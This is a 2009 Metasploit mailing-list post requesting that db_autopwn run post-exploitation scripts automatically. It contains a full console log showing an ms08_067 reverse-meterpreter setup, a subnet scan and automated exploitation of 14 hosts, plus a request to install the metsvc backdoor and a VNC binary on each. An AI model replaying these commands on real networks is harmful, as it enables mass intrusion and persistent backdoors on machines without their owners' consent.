Metasploit mailing list archives

Suggestion for db_autopwn


From: David Guimaraes <skysbsb () gmail com>
Date: Mon, 7 Dec 2009 19:30:38 -0200

I don't know if this already exists, but I want to be able to run an
automatic script when I am able to exploit some machine with db_autopwn,
because I have to do this (post-exploitation) manually after the exploitation.

I have a situation with 14 machines/sessions opened after db_autopwn
runs, and I want to execute a script like this in the 14 sessions.

metsvc (post exploitation bd)
uploadexec -e lv.exe (bind/execute vnc)


Even setting the AutoRunScript to execute a file with these commands does not
work.

root@skys-laptop:/pentest/exploits/framework3# ./msfconsole -r resourcers/lanhouse.cfg

 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v3.4-dev [core:3.4 api:1.0]
+ -- --=[ 458 exploits - 221 auxiliary
+ -- --=[ 262 payloads - 22 encoders - 8 nops
       =[ svn r7744 updated today (2009.12.07)



resource> use exploit/windows/smb/ms08_067_netapi
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST 10.1.1.103
LHOST => 10.1.1.103
resource> set AutoRunScript multiscript -s /pentest/exploits/framework3/ar.txt
AutoRunScript => multiscript -s /pentest/exploits/framework3/ar.txt
resource> set ExitOnSession false
ExitOnSession => false
resource> db_destroy teste
[*] Deleting teste...
resource> db_create teste
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: teste
resource> db_nmap -n -p 445 10.1.1.2-254 -T5

Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-07 19:08 BRST
...

Nmap done: 253 IP addresses (18 hosts up) scanned in 4.64 seconds

resource> db_autopwn -b -m ms08_067_netapi -p -e
[*] (1/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.19:445...
[*] (2/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.14:445...
[*] (3/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.4:445...
[*] (4/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.11:445...
[*] (5/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.9:445...
[*] Job limit reached, waiting on modules to finish...
[*] Meterpreter session 1 opened (10.1.1.56:50012 -> 10.1.1.19:32145)
[*] Meterpreter session 2 opened (10.1.1.56:54158 -> 10.1.1.11:13307)
[*] Meterpreter session 3 opened (10.1.1.56:44616 -> 10.1.1.4:11042)
[*] Meterpreter session 4 opened (10.1.1.56:40018 -> 10.1.1.14:10421)
[*] (6/16 [4 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.10:445...
[*] Meterpreter session 5 opened (10.1.1.56:57958 -> 10.1.1.9:6209)
[*] (7/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.12:445...
[*] (8/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.5:445...
[*] Job limit reached, waiting on modules to finish...
[*] (9/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.7:445...
[*] (10/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.6:445...
[*] Job limit reached, waiting on modules to finish...
[*] Meterpreter session 6 opened (10.1.1.56:54945 -> 10.1.1.5:22232)
[*] (11/16 [6 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.51:445...
[*] Job limit reached, waiting on modules to finish...
[*] Meterpreter session 7 opened (10.1.1.56:36052 -> 10.1.1.6:25321)
[*] Meterpreter session 8 opened (10.1.1.56:47654 -> 10.1.1.10:26463)
[*] Meterpreter session 9 opened (10.1.1.56:58837 -> 10.1.1.7:22313)
[*] (12/16 [9 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.8:445...
[*] (13/16 [9 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.20:445...
[*] Job limit reached, waiting on modules to finish...
[*] Meterpreter session 10 opened (10.1.1.56:44769 -> 10.1.1.12:13791)
[*] (14/16 [10 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.17:445...
[*] Job limit reached, waiting on modules to finish...
[*] (15/16 [10 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.3:445...
[*] (16/16 [10 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.2:445...
[*] (16/16 [10 sessions]): Waiting on 5 launched modules to finish
execution...
[*] Meterpreter session 11 opened (10.1.1.56:43583 -> 10.1.1.20:7354)
[*] (16/16 [11 sessions]): Waiting on 5 launched modules to finish
execution...
[*] Meterpreter session 12 opened (10.1.1.56:54405 -> 10.1.1.17:6410)
[*] Meterpreter session 13 opened (10.1.1.56:40651 -> 10.1.1.8:8901)
[*] Meterpreter session 14 opened (10.1.1.56:47355 -> 10.1.1.3:21465)
[*] (16/16 [14 sessions]): Waiting on 1 launched modules to finish
execution...

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  10.1.1.56:50012 -> 10.1.1.19:32145
  2   Meterpreter  10.1.1.56:54158 -> 10.1.1.11:13307
  3   Meterpreter  10.1.1.56:44616 -> 10.1.1.4:11042
  4   Meterpreter  10.1.1.56:40018 -> 10.1.1.14:10421
  5   Meterpreter  10.1.1.56:57958 -> 10.1.1.9:6209
  6   Meterpreter  10.1.1.56:54945 -> 10.1.1.5:22232
  7   Meterpreter  10.1.1.56:36052 -> 10.1.1.6:25321
  8   Meterpreter  10.1.1.56:47654 -> 10.1.1.10:26463
  9   Meterpreter  10.1.1.56:58837 -> 10.1.1.7:22313
  10  Meterpreter  10.1.1.56:44769 -> 10.1.1.12:13791
  11  Meterpreter  10.1.1.56:43583 -> 10.1.1.20:7354
  12  Meterpreter  10.1.1.56:54405 -> 10.1.1.17:6410
  13  Meterpreter  10.1.1.56:40651 -> 10.1.1.8:8901
  14  Meterpreter  10.1.1.56:47355 -> 10.1.1.3:21465


Making db_autopwn execute the AutoRunScript parameter after successful
exploitation would help me a lot.

-- 
David Gomes Guimarães